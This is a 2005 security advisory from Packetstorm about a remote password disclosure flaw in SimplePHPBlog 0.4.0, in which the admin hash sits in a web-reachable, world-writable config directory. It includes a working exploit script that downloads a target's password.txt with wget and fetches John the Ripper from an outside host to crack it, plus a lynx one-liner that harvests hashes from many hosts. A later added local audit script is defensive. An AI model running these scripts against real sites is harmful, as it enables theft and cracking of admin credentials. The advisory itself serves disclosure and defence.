simplephpBlog040.txt

08 Jul 2005 00:00:00 | Reported by pjphem | Type: packetstorm | Source: packetstormsecurity.com

Remote Password Disclosure vulnerability in SimplePHPBlog 0.4.0 discovered in 2005.

Code
`  
__ .__  
______ |__|_____ | | ___.__.  
\____ \ | \____ \| |< | |  
| |_> > | | |_> > |_\___ |  
| __/\__| | __/|____/ ____|  
|__| \______|__| \/ Where is the security? ...  
  
Security Advisory 2005-0x00  
  
Authors......... pjphem && LazyCrs  
Date............ 07/07/2005  
Vendor.......... www.simplephpblog.com  
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure  
  
  
  
o The Problem:  
--------------  
  
  
bash-3.00# cat install02.php  
  
$result = create_folder( 'config' );  
  
bash-3.00# cat sb_login.php  
  
// If there's no password file then need to redirect them.  
$passFile = 'config/password.txt';  
  
----------------------------------------------------------------------------------------  
  
function create_password ( $user, $pass ) {  
// Generate and store password hash  
  
$mypasswd = $user.$pass;  
$hashed = crypt($mypasswd);  
  
// Save File  
$filename = 'config/password.txt';  
$result = sb_write_file( $filename, $hashed );  
  
----------------------------------------------------------------------------------------  
  
function check_password ( $user, $pass ) {  
// Check password against hashed password file  
  
$passFile = 'config/password.txt';  
$hashed = sb_read_file( $passFile );  
  
  
bash-3.00# ls -l `pwd` |grep config  
drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config  
  
  
o Proof of concept:  
-------------------  
  
bash-3.00$ cat 0xfuck-phpblog.sh  
#!/bin/bash  
###################################################################  
#  
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)  
#  
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS  
#  
# This is published proprietary source code of 0xpjply  
#  
# (C) COPYRIGHT 0xpjply security guru group, 2005  
# All Rights Reserved  
#  
# dummy exploit written by pjphem && infected on July 2005  
#  
###################################################################  
# contact:  
# pjphem && LazyCrs  
#  
# [email protected] && [email protected]  
#  
#Greetz:  
#  
# You think you know? You have no idea!  
# fluffi-  
#  
#  
#  
# RAFA FREE  
#  
###################################################################  
echo ""  
echo ""  
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "  
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := "  
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "  
echo ""  
echo " c0de by pjphem "  
echo ""  
echo ""  
echo " vulnerabili Simple php blog 0.4.4 <= "  
echo ""  
echo ""  
echo -n "inserisci un hostname: " ; read hostname ;  
echo -n "inserisci dir: " ; read dir ;  
echo ""  
echo "[*] praparando l'ambiente..."  
mkdir 0xpjply  
cd 0xpjply  
echo -t3 "[*] OK!"  
echo "[*] Cattura password..."  
wget http://$hostname/$dir/config/password.txt  
echo "[*] OK!"  
echo ""  
echo ""  
echo "Show password: (md5)"  
echo ""  
cat password.txt  
echo ""  
rm -rf password.txt  
echo ""  
echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] "  
read Q  
if [ $Q = y ];  
then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz  
else  
exit 1;  
fi  
tar -zxf john.tar.gz  
cd john  
echo ""  
echo "[*] Dowloading password.."  
echo ""  
wget http://$hostname/$dir/config/password.txt  
echo ""  
echo "Done!"  
echo ""  
echo "STARING John for decript password.. enJoy"  
./jonh password.txt  
echo ""  
echo ""  
bash-3.00$  
  
  
  
  
bash-3.00$ cat 0xfuck-phpblog-scanner.sh  
#!/bin/bash  
#  
# Simple tester for phpblog  
#  
# phpblog 0.4.4 <=  
#  
#######################################  
echo "host , directory blog: (ex. test.it blog)"  
read HOST BLOG  
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3  
bash-3.00$  
  
  
  
  
`
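
The advisory shows the password hash written to `config/password.txt` under the blog's web directory, with `config` created mode `drwxrwxrwx`. The following local audit is an added example, not part of the original advisory or of SimplePHPBlog; it checks an installation on disk for those conditions. It assumes an Apache-style `.htaccess` deny rule is what should keep `config/` unreachable over HTTP, and the path in the usage comment is a constructed placeholder.

```shell
#!/bin/sh
# Added example (not from the advisory): local audit of a SimplePHPBlog tree
# for the conditions shown under "The Problem". Assumes an Apache-style
# .htaccess is what keeps config/ out of reach of HTTP clients.

# audit_blog DIR: print one "FINDING:" line per issue; return 1 if any.
audit_blog() {
    cfg="$1/config"
    pw="$cfg/password.txt"
    rc=0
    [ -d "$cfg" ] || { echo "no config/ under $1"; return 0; }

    # Character 9 of the mode string is the "other" write bit,
    # e.g. drwxrwxrwx as in the advisory's ls output.
    case "$(ls -ld "$cfg")" in
        ????????w*) echo "FINDING: $cfg is world-writable"; rc=1 ;;
    esac

    if [ -f "$pw" ]; then
        # Character 8 is the "other" read bit.
        case "$(ls -l "$pw")" in
            ???????r*) echo "FINDING: $pw is world-readable"; rc=1 ;;
        esac
    fi

    # The hash file sits under the document root, so something must
    # deny HTTP access to the directory.
    if ! grep -Eiq 'deny from all|require all denied' "$cfg/.htaccess" 2>/dev/null; then
        echo "FINDING: no deny rule in $cfg/.htaccess"; rc=1
    fi
    return $rc
}

# Usage: sh audit.sh /var/www/blog   (constructed example path)
if [ $# -gt 0 ]; then audit_blog "$1"; fi
```

A clean result means the directory is not world-writable, the hash file is not world-readable, and a deny rule is present; it does not confirm that the web server honours `.htaccess` overrides.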
